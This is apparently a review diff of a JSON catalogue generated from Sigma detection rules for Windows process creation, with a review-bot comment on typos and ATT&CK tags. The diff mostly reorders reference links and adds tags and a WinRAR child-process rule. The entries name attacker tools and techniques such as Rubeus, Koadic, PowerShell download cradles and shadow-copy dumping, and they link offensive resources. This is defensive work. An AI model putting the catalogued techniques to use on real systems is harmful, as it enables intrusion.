 "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
 "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml"
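Review bot: The `falsepositive` string in the new DiskShadow entry carries two typos, `False postitve` and `levreage`; the corrected text is `"False positive can occur in cases where admin scripts leverage the \"exec\" flag to execute applications"`. Because this file is regenerated from the upstream rule (`proc_creation_win_diskshadow_child_process_susp.yml`, linked in `refs`), the fix belongs in that rule's `falsepositives` field followed by a regeneration, otherwise the next sync reintroduces it. The tag pair `attack.execution` / `attack.t1218` may also deserve a second look: T1218 is filed under Defense Evasion in ATT&CK, so the tactic tag appears not to match the technique, though that too would be inherited from upstream rather than introduced here.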
@@ -44146,13 +44659,13 @@
 "logsource.product": "windows",
 "refs": [
 "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
 "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
- "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest",
+ "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
 "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml"
 ],
 "tags": [
@@ -44193,8 +44706,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://github.com/hfiref0x/UACME",
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
 "https://twitter.com/hFireF0X/status/897640081053364225",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml"
@@ -44278,8 +44791,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nas_bench/status/1535431474429808642",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/",
+ "https://twitter.com/nas_bench/status/1535431474429808642",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"
 ],
 "tags": [
@@ -44321,9 +44834,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product",
 "https://www.yeahhub.com/list-installed-programs-version-path-windows/",
 "https://thedfirreport.com/2023/03/06/2022-year-in-review/",
- "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml"
 ],
 "tags": [
@@ -44356,9 +44869,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65",
 "https://redcanary.com/blog/yellow-cockatoo/",
- "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
 "https://zero2auto.com/2020/05/19/netwalker-re/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml"
 ],
@@ -44518,8 +45031,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.joeware.net/freetools/tools/adfind/",
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml"
 ],
 "tags": [
@@ -44552,8 +45065,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.pdq.com/pdq-deploy/",
 "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md",
+ "https://www.pdq.com/pdq-deploy/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml"
 ],
 "tags": [
@@ -44752,6 +45265,40 @@
 "uuid": "327ff235-94eb-4f06-b9de-aaee571324be",
 "value": "Regsvr32 Execution From Highly Suspicious Location"
 },
+ {
+ "description": "Detects potentially suspicious child processes of WinRAR.exe.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/08/31",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_winrar_susp_child_process.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
+ "https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1203"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "146aace8-9bd6-42ba-be7a-0070d8027b76",
+ "value": "Potentially Suspicious Child Process Of WinRAR.EXE"
+ },
 {
 "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM",
 "meta": {
@@ -44820,16 +45367,16 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://bunnyinside.com/?term=f71e8cb9c76a",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
 "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml"
 ],
 "tags": [
@@ -44862,8 +45409,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/",
 "https://twitter.com/0gtweet/status/1457676633809330184",
+ "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml"
 ],
 "tags": [
@@ -44896,9 +45443,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml"
 ],
 "tags": [
@@ -44933,8 +45480,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://www.poweradmin.com/paexec/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml"
 ],
 "tags": [
@@ -45078,8 +45625,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/jonasLyk/status/1555914501802921984",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
 "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml"
 ],
@@ -45330,8 +45877,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1628720819537936386",
 "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://twitter.com/0gtweet/status/1628720819537936386",
 "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml"
 ],
@@ -45400,8 +45947,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/",
 "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
+ "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml"
 ],
 "tags": [
@@ -45458,8 +46005,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
 "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/",
+ "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml"
 ],
 "tags": [
@@ -45567,8 +46114,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.autohotkey.com/download/",
 "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/",
+ "https://www.autohotkey.com/download/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml"
 ],
 "tags": [
@@ -45591,9 +46138,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
- "https://twitter.com/bryon_/status/975835709587075072",
 "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15",
+ "https://twitter.com/bryon_/status/975835709587075072",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"
 ],
 "tags": [
@@ -45766,14 +46313,44 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
- "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
 "https://twitter.com/splinter_code/status/1483815103279603714",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1564.003",
+ "attack.t1134.002",
+ "attack.t1059.003"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84",
 "value": "PUA - AdvancedRun Execution"
 },
@@ -45857,9 +46434,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
- "https://github.com/GhostPack/Rubeus",
 "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus",
+ "https://github.com/GhostPack/Rubeus",
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml"
 ],
 "tags": [
@@ -45912,8 +46489,20 @@
 "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1132.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "98767d61-b2e8-4d71-b661-e36783ee24c1",
 "value": "Gzip Archive Decode Via PowerShell"
 },
@@ -45963,10 +46552,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
- "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
 "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
+ "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml"
 ],
 "tags": [
@@ -46265,8 +46854,20 @@
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1132.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f",
 "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation"
 },
@@ -46350,9 +46951,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/",
 "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
 "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
+ "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml"
 ],
 "tags": [
@@ -46434,8 +47035,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
 "https://ss64.com/nt/dsacls.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml"
 ],
 "tags": [
@@ -46609,8 +47210,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml"
 ],
 "tags": [
@@ -46646,8 +47247,39 @@
 "https://github.com/winsiderss/systeminformer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.discovery",
+ "attack.defense_evasion",
+ "attack.t1082",
+ "attack.t1564",
+ "attack.t1543"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5722dff1-4bdd-4949-86ab-fbaf707e767a",
 "value": "PUA - System Informer Execution"
 },
@@ -46690,8 +47322,29 @@
 "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1105"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6e897651-f157-4d8f-aaeb-df8151488385",
 "value": "PowerShell Web Download"
 },
@@ -46708,14 +47361,27 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
- "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
 "https://twitter.com/splinter_code/status/1483815103279603714",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1134.002"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707",
 "value": "PUA - AdvancedRun Suspicious Execution"
 },
@@ -46732,9 +47398,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md",
 "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md",
 "https://github.com/dsnezhkov/TruffleSnout",
+ "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml"
 ],
 "tags": [
@@ -46768,8 +47434,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
 "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml"
 ],
 "tags": [
@@ -46803,10 +47469,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://twitter.com/EricaZelic/status/1614075109827874817",
 "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
 "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
+ "https://twitter.com/EricaZelic/status/1614075109827874817",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml"
 ],
 "tags": [
@@ -46923,8 +47589,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/",
 "https://twitter.com/pabraeken/status/999090532839313408",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/",
 "https://twitter.com/pabraeken/status/995837734379032576",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"
 ],
@@ -47026,8 +47692,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism",
 "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml"
 ],
 "tags": [
@@ -47084,8 +47750,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16",
+ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"
 ],
@@ -47120,8 +47786,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/",
- "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/",
 "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
+ "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml"
 ],
 "tags": [
@@ -47291,8 +47957,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://redcanary.com/blog/right-to-left-override/",
- "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
 "https://unicode-explorer.com/c/202E",
+ "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml"
 ],
 "tags": [
@@ -47325,8 +47991,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
 "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/",
+ "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
 "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml"
 ],
@@ -47368,10 +48034,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior",
- "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior",
- "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior",
 "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior",
